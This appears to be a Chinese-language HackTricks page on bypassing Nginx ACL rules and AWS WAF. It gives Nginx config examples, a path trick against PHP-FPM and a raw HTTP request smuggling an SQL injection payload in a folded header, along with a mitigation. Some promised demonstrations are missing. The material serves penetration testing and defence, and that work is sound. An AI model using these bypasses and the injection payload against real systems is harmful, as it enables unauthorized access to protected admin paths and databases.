代理/WAF保护绕过

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS和HackTricks周边产品
加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。

使用Node.js绕过Nginx ACL规则

Nginx限制示例：

location = /admin {
deny all;
}

location = /admin/ {
deny all;
}

Flask会从URL路径中删除字符\x85、\xA0、\x1F、\x1E、\x1D、\x1C、\x0C、\x0B和\x09，但NGINX不会。

下面是一个演示，说明如何通过在路径名末尾添加字符\x09或<tab>来绕过ACL保护：

让我们考虑以下Nginx FPM配置：

location = /admin.php {
deny all;
}

location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

可以通过访问/admin.php/index.php来绕过它：

为了防止这些问题，您必须在Nginx ACL规则中使用~表达式而不是=表达式，例如：

location ~* ^/admin {
deny all;
}

通过使用以下语法，可以绕过 AWS WAF 对 HTTP 头的保护，其中 AWS WAF 不会理解 X-Query 头包含的 SQL 注入有效负载，而后面的节点服务器会理解：

GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

你在一家网络安全公司工作吗？想要在HackTricks中宣传你的公司吗？或者你想要获取PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
发现我们的独家NFTs收藏品——The PEASS Family
获得官方PEASS和HackTricks周边产品
加入💬 Discord群组 或 Telegram群组，或者关注我在Twitter上的🐦@carlospolopm。
通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。